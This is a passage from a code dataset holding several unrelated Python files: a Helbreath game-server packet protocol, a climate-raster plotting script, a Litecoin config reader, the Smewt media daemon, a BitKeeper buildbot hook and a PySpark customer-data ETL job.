ok_(match[0].startswith(\'/something/really\'))\n eq_(match[2][\'hits\'], 1)\n eq_(match[2][\'misses\'], 1)\n', ""#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#\thb_balancer\n#\tHigh performance load balancer between Helbreath World Servers.\n#\n#\tCopyright (C) 2012 Michał Papierski dummy@email.com\n\n#\tThis program is free software: you can redistribute it and/or modify\n#\tit under the terms of the GNU Affero General Public License as\n#\tpublished by the Free Software Foundation, either version 3 of the\n#\tLicense, or (at your option) any later version.\n\n#\tThis program is distributed in the hope that it will be useful,\n#\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\n#\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n#\tGNU Affero General Public License for more details.\n\n#\tYou should have received a copy of the GNU Affero General Public License\n#\talong with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n\nimport struct\nimport random\nimport logging\n\nfrom twisted.internet import reactor\nfrom twisted.protocols.stateful import StatefulProtocol\nfrom twisted.python import log\n\nfrom packets import Packets\n\nclass BaseHelbreathProtocol(StatefulProtocol):\n\t''' Basic Helbreath Protocol '''\n\t\n\tdef getInitialState(self):\n\t\t'''\n\t\t\tProtocol overview:\n\t\t\t[Key unsigned byte] [Size unsigned short] [Data Size-bytes]\n\t\t'''\n\t\treturn (self.get_key, 1)\n\t\t\t\t\n\tdef get_key(self, data):\n\t\t''' Get key '''\n\t\tself.key, = struct.unpack('<B', data)\n\t\treturn (self.get_data_size, 2)\n\t\n\tdef get_data_size(self, data):\n\t\t''' Get the packet size (key byte + size word = 3 header bytes) '''\n\t\tself.data_size, = struct.unpack('<H', data)\n\t\treturn (self.get_data, self.data_size - 3)\n\t\n\tdef get_data(self, data):\n\t\t''' Decode the payload '''\n\t\tif self.key > 0:\n\t\t\t# Decode\n\t\t\tdata = list(data)\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdata[i] = chr(((ord(data[i]) ^ (self.key ^ (self.data_size - 3 - i))) - (i ^ self.key)) % 256)\n\t\t\tdata = ''.join(data)\n\t\t\n\t\t# Pass decoded data\n\t\tself.raw_data(data)\n\t\t\n\t\treturn (self.get_key, 1)\n\t\n\tdef send_message(self, data):\n\t\t''' Send a Helbreath Packet data '''\n\t\tkey = random.randint(0, 255)\n\t\tif key > 0:\n\t\t\t# Encode\n\t\t\tdata = list(data)\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdata[i] = chr(((ord(data[i]) + (i ^ key)) ^ (key ^ (len(data) - i))) % 256)\n\t\t\tdata = ''.join(data)\n\t\tself.transport.write(struct.pack('<BH', key, len(data) + 3) + data)\n"", ""def sort_files( files, split_on='_', elem_month=-2, elem_year=-1 ):\n\t'''\n\tsort a list of files by the month and year in filenames ending in '_MM_YYYY.tif'. If sorted using base\n\tPythons sort/sorted functions, things will be sorted by the first char\n\tof the month, which makes things go 1, 11, ... which sucks for timeseries;\n\tthis sorts it properly following SNAP standards as the default settings.\n\n\tARGUMENTS:\n\t----------\n\tfiles = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.\n\tsplit_on = [str] `str` character to split the filename on. default:'_', SNAP standard.\n\telem_month = [int] slice element from resultant split filename list. Follows Python slicing syntax.\n\t\tdefault:-2. For SNAP standard.\n\telem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.\n\t\tdefault:-1. For SNAP standard.\n\n\tRETURNS:\n\t--------\n\tsorted `list` by month and year ascending. 
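\n\n\tEXAMPLE (illustrative filenames):\n\t---------------------------------\n\t>>> sort_files( ['tas_1_2001.tif', 'tas_11_2000.tif', 'tas_2_2000.tif'] )\n\t['tas_2_2000.tif', 'tas_11_2000.tif', 'tas_1_2001.tif']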
\n\n\t'''\n\timport pandas as pd\n\tmonths = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_month]) for fn in files ]\n\tyears = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]\n\tdf = pd.DataFrame( {'fn':files, 'month':months, 'year':years} )\n\tdf_sorted = df.sort_values( ['year', 'month' ] )\n\treturn df_sorted.fn.tolist()\ndef only_years( files, begin=1901, end=2100, split_on='_', elem_year=-1 ):\n\t'''\n\treturn new list of filenames where they are truncated to begin:end\n\n\tARGUMENTS:\n\t----------\n\tfiles = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.\n\tbegin = [int] four digit integer year of the begin time default:1901\n\tend = [int] four digit integer year of the end time default:2100\n\tsplit_on = [str] `str` character to split the filename on. default:'_', SNAP standard.\n\telem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.\n\t\tdefault:-1. For SNAP standard.\n\n\tRETURNS:\n\t--------\n\tsliced `list` to begin and end year.\n\t'''\n\timport pandas as pd\n\tyears = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]\n\tdf = pd.DataFrame( { 'fn':files, 'year':years } )\n\tdf_slice = df[ (df.year >= begin ) & (df.year <= end ) ]\n\treturn df_slice.fn.tolist()\ndef masked_mean( fn, bounds=None ):\n\t''' get mean of the full domain since the data are already clipped \n\tmostly used for processing lots of files in parallel.'''\n\timport numpy as np\n\timport rasterio\n\t\t\n\twith rasterio.open( fn ) as rst:\n\t\tif bounds:\n\t\t\twindow = rst.window( *bounds )\n\t\telse:\n\t\t\twindow = rst.window( *rst.bounds )\n\t\tmask = (rst.read_masks( 1 ) == 0)\n\t\tarr = np.ma.masked_array( rst.read( 1, window=window ), mask=mask )\n\treturn np.mean( arr )\n\nif __name__ == '__main__':\n\timport os, glob\n\timport geopandas as gpd\n\timport numpy as np\n\timport xarray as xr\n\timport matplotlib\n\tmatplotlib.use( 'agg' )\n\tfrom matplotlib import pyplot as plt\n\tfrom pathos.mp_map import mp_map\n\timport pandas as pd\n\timport geopandas as gpd\n\t\n\t# args / set working dir\n\tbase_dir = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data'\n\tos.chdir( base_dir )\n\t# scenarios = ['rcp60', 'rcp85']\n\tscenarios = ['historical']\n\tshp_fn = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/SCTC_studyarea/Kenai_StudyArea.shp'\n\tshp = gpd.read_file( shp_fn )\n\tbounds = shp.bounds\n\n\t# models = ['5ModelAvg','CRU_TS323','GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']\n\t# models = ['GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']\n\tmodels = ['ts323']\n\tvariables_list = [['pr']]# ['tasmax', 'tas', 'tasmin']]#,\n\t# models = ['CRU_TS323']\n\t# begin_end_groups = [[2016,2016],[2010,2020],[2095, 2100]]\n\tbegin_end_groups = [[1916, 1916],[1950, 1960],[1995, 2000]]\n\n\tfor scenario in scenarios:\n\t\tfor variables in variables_list:\n\t\t\tfor m in models:\n\t\t\t\tfor begin, end in begin_end_groups: # not fully wired-up yet\n\t\t\t\t\tif m == 'ts323':\n\t\t\t\t\t\told_dir = 'PI:KEY'\n\t\t\t\t\t\t# begin = 1950\n\t\t\t\t\t\t# end = 1965\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tif scenario == 'historical':\n\t\t\t\t\t\t\told_dir = '/Data/Base_Data/Climate/AK_CAN_2km/historical/AR5_CMIP5_models'\n\t\t\t\t\t\t\t# begin = 1950\n\t\t\t\t\t\t\t# end = 1965\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\told_dir = 
'/Data/Base_Data/Climate/AK_CAN_2km/projected/AR5_CMIP5_models'\n\t\t\t\t\t\t\t# begin = 2095\n\t\t\t\t\t\t\t# end = 2100\n\n\t\t\t\t\tfigsize = (16,9)\n\t\t\t\t\tout = {}\n\t\t\t\t\tfor v in variables:\n\t\t\t\t\t\tpath = os.path.join( base_dir,'downscaled', m, scenario, v )\n\t\t\t\t\t\tprint( path )\n\t\t\t\t\t\tfiles = glob.glob( os.path.join( path, '*.tif' ) )\n\t\t\t\t\t\tfiles = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )\n\t\t\t\t\t\tout[ v ] = mp_map( masked_mean, files, nproc=4 )\n\t\t\t\t\t\tif v == 'tas' or v == 'pr':\n\t\t\t\t\t\t\tif m == 'ts323':\n\t\t\t\t\t\t\t\tpath = os.path.join( old_dir, v )\n\t\t\t\t\t\t\t\tprint( path )\n\t\t\t\t\t\t\telse:\t\n\t\t\t\t\t\t\t\tpath = os.path.join( old_dir, scenario, m, v )\n\n\t\t\t\t\t\t\tfiles = glob.glob( os.path.join( path, '*.tif' ) )\n\t\t\t\t\t\t\tfiles = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )\n\t\t\t\t\t\t\tout[ v+'_old' ] = mp_map( masked_mean, files, nproc=4 )\n\n\t\t\t\t\t\t\t# nofix\n\t\t\t\t\t\t\tpath = os.path.join( base_dir,'downscaled_pr_nofix', m, scenario, v )\n\t\t\t\t\t\t\tprint( path )\n\t\t\t\t\t\t\tfiles = glob.glob( os.path.join( path, '*.tif' ) )\n\t\t\t\t\t\t\tfiles = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )\n\t\t\t\t\t\t\tout[ v+'_nofix' ] = mp_map( masked_mean, files, nproc=4 )\n\t\t\t\t\t\t\t\n\t\t\t\t\tplot_df = pd.DataFrame( out )\n\t\t\t\t\tplot_df.index = pd.date_range( start=str(begin), end=str(end+1), freq='M' )\n\t\t\t\t\t\n\t\t\t\t\t# sort the columns for output plotting cleanliness:\n\t\t\t\t\tif 'tas' in variables:\n\t\t\t\t\t\tcol_list = ['tasmax', 'tas_old', 'tas', 'tasmin']\n\t\t\t\t\telif 'pr' in variables:\n\t\t\t\t\t\tcol_list = ['pr', 'pr_old', 'pr_nofix']\n\t\t\t\t\t\n\t\t\t\t\tplot_df = plot_df[ col_list ] # get em in the order for plotting\n\n\t\t\t\t\tif v == 'pr':\n\t\t\t\t\t\tplot_df = plot_df.round()[['pr','pr_old']]\n\n\t\t\t\t\t# now plot the dataframe\n\t\t\t\t\tif begin == end:\n\t\t\t\t\t\ttitle = 'EPSCoR SC AOI Temp Metrics {} {} {}'.format( m, scenario, begin )\n\t\t\t\t\telse:\n\t\t\t\t\t\ttitle = 'EPSCoR SC AOI Temp Metrics {} {} {} - {}'.format( m, scenario, begin, end )\n\n\t\t\t\t\tif 'tas' in variables:\n\t\t\t\t\t\tcolors = ['red', 'black', 'blue', 'red' ]\n\t\t\t\t\telse:\n\t\t\t\t\t\tcolors = [ 'blue', 'black', 'darkred' ]\n\n\t\t\t\t\tax = plot_df.plot( kind='line', title=title, figsize=figsize, color=colors )\n\n\t\t\t\t\toutput_dir = os.path.join( base_dir, 'compare_downscaling_versions_PR_no_fix' )\n\t\t\t\t\tif not os.path.exists( output_dir ):\n\t\t\t\t\t\tos.makedirs( output_dir )\n\n\t\t\t\t\t# now plot the dataframe\n\t\t\t\t\tout_metric_fn = 'temps'\n\t\t\t\t\tif 'pr' in variables:\n\t\t\t\t\t\tout_metric_fn = 'prec'\n\n\t\t\t\t\tif begin == end:\n\t\t\t\t\t\toutput_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin ) )\n\t\t\t\t\telse:\n\t\t\t\t\t\toutput_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin, end ) )\n\t\t\t\t\tplt.savefig( output_filename, dpi=400 )\n\t\t\t\t\tplt.close()\n\n\n\n\n\n# # # PRISM TEST VERSION DIFFERENCES # # # # # # #\n# import rasterio\n# import numpy as np\n# import os, glob, itertools\n\n# base_path = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/prism/raw_prism'\n# variables = [ 'tmax', 'tmin' ]\n\n# for variable in variables:\n# \tak_olds = sorted( 
glob.glob( os.path.join( base_path, 'prism_raw_older', 'ak', variable, '*.asc' ) ) )\n# \tak_news = sorted( glob.glob( os.path.join( base_path, 'prism_raw_2016', 'ak', variable, '*.asc' ) ) )\n\n# \tolds = np.array([ rasterio.open( i ).read( 1 ) for i in ak_olds if '_14' not in i ])\n# \tnews = np.array([ rasterio.open( i ).read( 1 ) *.10 for i in ak_news if '_14' not in i ])\n\n# \tout = olds - news\n# \tout[ (olds == -9999.0) | (news == -9999.0) ] = 0\n\n# \tuniques = np.unique( out )\n# \tuniques[ uniques > 0.01 ]\n"", '# Copyright (c) 2010 Witchspace dummy@email.com\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the ""Software""), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n""""""\nUtilities for reading litecoin configuration files.\n""""""\n\n\ndef read_config_file(filename):\n """"""\n Read a simple ``\'=\'``-delimited config file.\n Raises :const:`IOError` if unable to open file, or :const:`ValueError`\n if an parse error occurs.\n """"""\n f = open(filename)\n try:\n cfg = {}\n for line in f:\n line = line.strip()\n if line and not line.startswith(""#""):\n try:\n (key, value) = line.split(\'=\', 1)\n cfg[key] = value\n except ValueError:\n pass # Happens when line has no \'=\', ignore\n finally:\n f.close()\n return cfg\n\n\ndef read_default_config(filename=None):\n """"""\n Read litecoin default configuration from the current user\'s home directory.\n\n Arguments:\n\n - `filename`: Path to a configuration file in a non-standard location (optional)\n """"""\n if filename is None:\n import os\n import platform\n home = os.getenv(""HOME"")\n if not home:\n raise IOError(""Home directory not defined, don\'t know where to look for config file"")\n\n if platform.system() == ""Darwin"":\n location = \'Library/Application Support/Litecoin/litecoin.conf\'\n else:\n location = \'.litecoin/litecoin.conf\'\n filename = os.path.join(home, location)\n\n elif filename.startswith(""~""):\n import os\n filename = os.path.expanduser(filename)\n\n try:\n return read_config_file(filename)\n except (IOError, ValueError):\n pass # Cannot read config file, ignore\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Smewt - A smart collection manager\n# Copyright (c) 2010 Nicolas Wack dummy@email.com\n#\n# Smewt is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# Smewt is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even 
the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n\nfrom pygoo import MemoryObjectGraph, Equal, ontology\nfrom guessit.slogging import setupLogging\nfrom smewt import config\nfrom smewt.ontology import Episode, Movie, Subtitle, Media, Config\nfrom smewt.base import cache, utils, Collection\nfrom smewt.base.taskmanager import TaskManager, FuncTask\nfrom smewt.taggers import EpisodeTagger, MovieTagger\nfrom smewt.plugins.feedwatcher import FeedWatcher\nfrom threading import Timer\nimport smewt\nimport time\nimport os\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\nclass VersionedMediaGraph(MemoryObjectGraph):\n\n def __init__(self, *args, **kwargs):\n super(VersionedMediaGraph, self).__init__(*args, **kwargs)\n\n\n def add_object(self, node, recurse = Equal.OnIdentity, excluded_deps = list()):\n result = super(VersionedMediaGraph, self).add_object(node, recurse, excluded_deps)\n if isinstance(result, Media):\n result.lastModified = time.time()\n\n return result\n\n def clear_keep_config(self):\n # we want to keep our config object untouched\n tmp = MemoryObjectGraph()\n tmp.add_object(self.config)\n super(VersionedMediaGraph, self).clear()\n self.add_object(tmp.find_one(Config))\n\n def __getattr__(self, name):\n # if attr is not found and starts with an upper case letter, it might be the name\n # of one of the registered classes. In that case, return a function that would instantiate\n # such an object in this graph\n if name[0].isupper() and name in ontology.class_names():\n def inst(basenode = None, **kwargs):\n result = super(VersionedMediaGraph, self).__getattr__(name)(basenode, **kwargs)\n if isinstance(result, Media):\n result.lastModified = time.time()\n return result\n\n return inst\n\n raise AttributeError, name\n\n\n @property\n def config(self):\n try:\n return self.find_one(Config)\n except ValueError:\n return self.Config()\n\n\nclass SmewtDaemon(object):\n def __init__(self):\n super(SmewtDaemon, self).__init__()\n\n # Note: put log file in data dir instead of log dir so that it is\n # accessible through the user/ folder static view\n self.logfile = utils.path(smewt.dirs.user_data_dir, \'Smewt.log\')\n setupLogging(filename=self.logfile, with_time=True, with_thread=True)\n\n\n if smewt.config.PERSISTENT_CACHE:\n self.loadCache()\n\n # get a TaskManager for all the import tasks\n self.taskManager = TaskManager()\n\n # get our main graph DB\n self.loadDB()\n\n # get our collections: series and movies for now\n self.episodeCollection = Collection(name = \'Series\',\n # import episodes and their subtitles too\n validFiles = [ Episode.isValidEpisode,\n Subtitle.isValidSubtitle ],\n mediaTagger = EpisodeTagger,\n dataGraph = self.database,\n taskManager = self.taskManager)\n\n\n self.movieCollection = Collection(name = \'Movie\',\n # import movies and their subtitles too\n validFiles = [ Movie.isValidMovie,\n Subtitle.isValidSubtitle ],\n mediaTagger = MovieTagger,\n dataGraph = self.database,\n taskManager = self.taskManager)\n\n\n if config.REGENERATE_THUMBNAILS:\n # launch the regeneration of the thumbnails, but only after everything\n # is setup and we are able to serve requests\n Timer(3, self.regenerateSpeedDialThumbnails).start()\n\n if self.database.config.get(\'tvuMldonkeyPlugin\'):\n # load up the feed watcher\n self.feedWatcher = FeedWatcher(self)\n\n # FIXME: 
this should go into a plugin.init() method\n from smewt.plugins import mldonkey\n mldonkey.send_command(\'vm\')\n\n\n # do not rescan as it would be too long and we might delete some files that\n # are on an unaccessible network share or an external HDD\n self.taskManager.add(FuncTask(\'Update collections\', self.updateCollections))\n\n\n\n def quit(self):\n log.info(\'SmewtDaemon quitting...\')\n self.taskManager.finishNow()\n try:\n self.feedWatcher.quit()\n except AttributeError:\n pass\n\n self.saveDB()\n\n if smewt.config.PERSISTENT_CACHE:\n self.saveCache()\n\n log.info(\'SmewtDaemon quitting OK!\')\n\n\n def _cacheFilename(self):\n return utils.path(smewt.dirs.user_cache_dir, \'Smewt.cache\',\n createdir=True)\n\n def loadCache(self):\n cache.load(self._cacheFilename())\n\n def saveCache(self):\n cache.save(self._cacheFilename())\n\n def clearCache(self):\n cache.clear()\n cacheFile = self._cacheFilename()\n log.info(\'Deleting cache file: %s\' % cacheFile)\n try:\n os.remove(cacheFile)\n except OSError:\n pass\n\n\n def loadDB(self):\n dbfile = smewt.settings.get(\'database_file\')\n if not dbfile:\n dbfile = utils.path(smewt.dirs.user_data_dir, \'Smewt.database\',\n createdir=True)\n smewt.settings.set(\'database_file\', dbfile)\n\n log.info(\'Loading database from: %s\', dbfile)\n self.database = VersionedMediaGraph()\n try:\n self.database.load(dbfile)\n except:\n log.warning(\'Could not load database %s\', dbfile)\n\n def saveDB(self):\n dbfile = smewt.settings.get(\'database_file\')\n log.info(\'Saving database to %s\', dbfile)\n self.database.save(dbfile)\n\n def clearDB(self):\n log.info(\'Clearing database...\')\n self.database.clear_keep_config()\n self.database.save(smewt.settings.get(\'database_file\'))\n\n\n def updateCollections(self):\n self.episodeCollection.update()\n self.movieCollection.update()\n\n def rescanCollections(self):\n self.episodeCollection.rescan()\n self.movieCollection.rescan()\n\n\n def _regenerateSpeedDialThumbnails(self):\n import shlex, subprocess\n from PIL import Image\n from StringIO import StringIO\n webkit2png = (subprocess.call([\'which\', \'webkit2png\'], stdout=subprocess.PIPE) == 0)\n if not webkit2png:\n log.warning(\'webkit2png not found. 
please run: ""python setup.py install"" from within the 3rdparty/webkit2png folder\')\n return\n\n def gen(path, filename):\n width, height = 200, 150\n log.info(\'Creating %dx%d screenshot for %s...\' % (width, height, path))\n filename = utils.path(smewt.dirs.user_data_dir, \'speeddial\', filename, createdir=True)\n cmd = \'webkit2png -g 1000 600 ""http://localhost:6543%s""\' % path\n screenshot, _ = subprocess.Popen(shlex.split(cmd),\n stdout=subprocess.PIPE).communicate()\n im = Image.open(StringIO(screenshot))\n im.thumbnail((width, height), Image.ANTIALIAS)\n im.save(filename, ""PNG"")\n\n gen(\'/movies\', \'allmovies.png\')\n gen(\'/movies/table\', \'moviestable.png\')\n gen(\'/movies/recent\', \'recentmovies.png\')\n gen(\'/series\', \'allseries.png\')\n gen(\'/series/suggestions\', \'episodesuggestions.png\')\n gen(\'/feeds\', \'feeds.png\')\n\n def regenerateSpeedDialThumbnails(self):\n self.taskManager.add(FuncTask(\'Regenerate thumbnails\',\n self._regenerateSpeedDialThumbnails))\n', '#!/usr/local/bin/python\n#\n# BitKeeper hook script.\n#\n# svn_buildbot.py was used as a base for this file, if you find any bugs or\n# errors please email me.\n#\n# Amar Takhar dummy@email.com\n\n\n\'\'\'\n/path/to/bk_buildbot.py --repository ""$REPOS"" --revision ""$REV"" --branch \\\n"""" --bbserver localhost --bbport 9989\n\'\'\'\n\nimport commands\nimport sys\nimport os\nimport re\nif sys.version_info < (2, 6):\n import sets\n\n# We have hackish ""-d"" handling here rather than in the Options\n# subclass below because a common error will be to not have twisted in\n# PYTHONPATH; we want to be able to print that error to the log if\n# debug mode is on, so we set it up before the imports.\n\nDEBUG = None\n\nif \'-d\' in sys.argv:\n i = sys.argv.index(\'-d\')\n DEBUG = sys.argv[i+1]\n del sys.argv[i]\n del sys.argv[i]\n\nif DEBUG:\n f = open(DEBUG, \'a\')\n sys.stderr = f\n sys.stdout = f\n\n\nfrom twisted.internet import defer, reactor\nfrom twisted.python import usage\nfrom twisted.spread import pb\nfrom twisted.cred import credentials\n\n\nclass Options(usage.Options):\n optParameters = [\n [\'repository\', \'r\', None,\n ""The repository that was changed.""],\n [\'revision\', \'v\', None,\n ""The revision that we want to examine (default: latest)""],\n [\'branch\', \'b\', None,\n ""Name of the branch to insert into the branch field. 
(REQUIRED)""],\n [\'category\', \'c\', None,\n ""Schedular category.""],\n [\'bbserver\', \'s\', \'localhost\',\n ""The hostname of the server that buildbot is running on""],\n [\'bbport\', \'p\', 8007,\n ""The port that buildbot is listening on""]\n ]\n optFlags = [\n [\'dryrun\', \'n\', ""Do not actually send changes""],\n ]\n\n def __init__(self):\n usage.Options.__init__(self)\n\n def postOptions(self):\n if self[\'repository\'] is None:\n raise usage.error(""You must pass --repository"")\n\nclass ChangeSender:\n\n def getChanges(self, opts):\n """"""Generate and stash a list of Change dictionaries, ready to be sent\n to the buildmaster\'s PBChangeSource.""""""\n\n # first we extract information about the files that were changed\n repo = opts[\'repository\']\n print ""Repo:"", repo\n rev_arg = \'\'\n if opts[\'revision\']:\n rev_arg = \'-r""%s""\' % (opts[\'revision\'], )\n changed = commands.getoutput(""bk changes -v %s -d\':GFILE:\\\\n\' \'%s\'"" % (\n rev_arg, repo)).split(\'\\n\')\n\n # Remove the first line, it\'s an info message you can\'t remove (annoying)\n del changed[0]\n\n change_info = commands.getoutput(""bk changes %s -d\':USER:\\\\n$each(:C:){(:C:)\\\\n}\' \'%s\'"" % (\n rev_arg, repo)).split(\'\\n\')\n\n # Remove the first line, it\'s an info message you can\'t remove (annoying)\n del change_info[0]\n\n who = change_info.pop(0)\n branch = opts[\'branch\']\n message = \'\\n\'.join(change_info)\n revision = opts.get(\'revision\')\n\n changes = {\'who\': who,\n \'branch\': branch,\n \'files\': changed,\n \'comments\': message,\n \'revision\': revision}\n\n if opts.get(\'category\'):\n changes[\'category\'] = opts.get(\'category\')\n\n return changes\n\n\n def sendChanges(self, opts, changes):\n pbcf = pb.PBClientFactory()\n reactor.connectTCP(opts[\'bbserver\'], int(opts[\'bbport\']), pbcf)\n d = pbcf.login(credentials.UsernamePassword(\'change\', \'changepw\'))\n d.addCallback(self.sendAllChanges, changes)\n return d\n\n def sendAllChanges(self, remote, changes):\n dl = remote.callRemote(\'addChange\', changes)\n return dl\n\n def run(self):\n opts = Options()\n try:\n opts.parseOptions()\n if not opts[\'branch\']:\n print ""You must supply a branch with -b or --branch.""\n sys.exit(1);\n\n except usage.error, ue:\n print opts\n print ""%s: %s"" % (sys.argv[0], ue)\n sys.exit()\n\n changes = self.getChanges(opts)\n if opts[\'dryrun\']:\n for k in changes.keys():\n print ""[%10s]: %s"" % (k, changes[k])\n print ""*NOT* sending any changes""\n return\n\n d = self.sendChanges(opts, changes)\n\n def quit(*why):\n print ""quitting! 
because"", why\n reactor.stop()\n\n def failed(f):\n print ""FAILURE: %s"" % f\n reactor.stop()\n\n d.addErrback(failed)\n d.addCallback(quit, ""SUCCESS"")\n reactor.callLater(60, quit, ""TIMEOUT"")\n\n reactor.run()\n\n\nif __name__ == \'__main__\':\n s = ChangeSender()\n s.run()\n', '#coding=UTF-8\nfrom pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext\nfrom pyspark.sql.types import *\nfrom datetime import date, datetime, timedelta\nimport sys, re, os\n\nst = datetime.now()\nconf = SparkConf().setAppName(\'PROC_O_LNA_XDXT_CUSTOMER_INFO\').setMaster(sys.argv[2])\nsc = SparkContext(conf = conf)\nsc.setLogLevel(\'WARN\')\nif len(sys.argv) > 5:\n if sys.argv[5] == ""hive"":\n sqlContext = HiveContext(sc)\nelse:\n sqlContext = SQLContext(sc)\nhdfs = sys.argv[3]\ndbname = sys.argv[4]\n\n#处理需要使用的日期\netl_date = sys.argv[1]\n#etl日期\nV_DT = etl_date \n#上一日日期\nV_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime(""%Y%m%d"")\n#月初日期\nV_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime(""%Y%m%d"") \n#上月末日期\nV_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime(""%Y%m%d"")\n#10位日期\nV_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime(""%Y-%m-%d"")\nV_STEP = 0\n\nO_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+\'/O_CI_XDXT_CUSTOMER_INFO/*\')\nO_CI_XDXT_CUSTOMER_INFO.registerTempTable(""O_CI_XDXT_CUSTOMER_INFO"")\n\n#任务[12] 001-01::\nV_STEP = V_STEP + 1\n#先删除原表所有数据\nret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/*.parquet"")\n#从昨天备表复制一份全量过来\nret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet"")\n\n\nF_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+\'/F_CI_XDXT_CUSTOMER_INFO/*\')\nF_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"")\n\nsql = """"""\n SELECT A.CUSTOMERID AS CUSTOMERID \n ,A.CUSTOMERNAME AS CUSTOMERNAME \n ,A.CUSTOMERTYPE AS CUSTOMERTYPE \n ,A.CERTTYPE AS CERTTYPE \n ,A.CERTID AS CERTID \n ,A.CUSTOMERPASSWORD AS CUSTOMERPASSWORD \n ,A.INPUTORGID AS INPUTORGID \n ,A.INPUTUSERID AS INPUTUSERID \n ,A.INPUTDATE AS INPUTDATE \n ,A.REMARK AS REMARK \n ,A.MFCUSTOMERID AS MFCUSTOMERID \n ,A.STATUS AS STATUS \n ,A.BELONGGROUPID AS BELONGGROUPID \n ,A.CHANNEL AS CHANNEL \n ,A.LOANCARDNO AS LOANCARDNO \n ,A.CUSTOMERSCALE AS CUSTOMERSCALE \n ,A.CORPORATEORGID AS CORPORATEORGID \n ,A.REMEDYFLAG AS REMEDYFLAG \n ,A.DRAWFLAG AS DRAWFLAG \n ,A.MANAGERUSERID AS MANAGERUSERID \n ,A.MANAGERORGID AS MANAGERORGID \n ,A.DRAWELIGIBILITY AS DRAWELIGIBILITY \n ,A.BLACKSHEETORNOT AS BLACKSHEETORNOT \n ,A.CONFIRMORNOT AS CONFIRMORNOT \n ,A.CLIENTCLASSN AS CLIENTCLASSN \n ,A.CLIENTCLASSM AS CLIENTCLASSM \n ,A.BUSINESSSTATE AS BUSINESSSTATE \n ,A.MASTERBALANCE AS MASTERBALANCE \n ,A.UPDATEDATE AS UPDATEDATE \n ,A.FR_ID AS FR_ID \n ,V_DT AS ODS_ST_DATE \n ,\'LNA\' AS ODS_SYS_ID \n FROM O_CI_XDXT_CUSTOMER_INFO A --客户基本信息\n""""""\n\nsql = re.sub(r""\\bV_DT\\b"", ""\'""+V_DT10+""\'"", sql)\nF_CI_XDXT_CUSTOMER_INFO_INNTMP1 = sqlContext.sql(sql)\nF_CI_XDXT_CUSTOMER_INFO_INNTMP1.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO_INNTMP1"")\n\n#F_CI_XDXT_CUSTOMER_INFO = 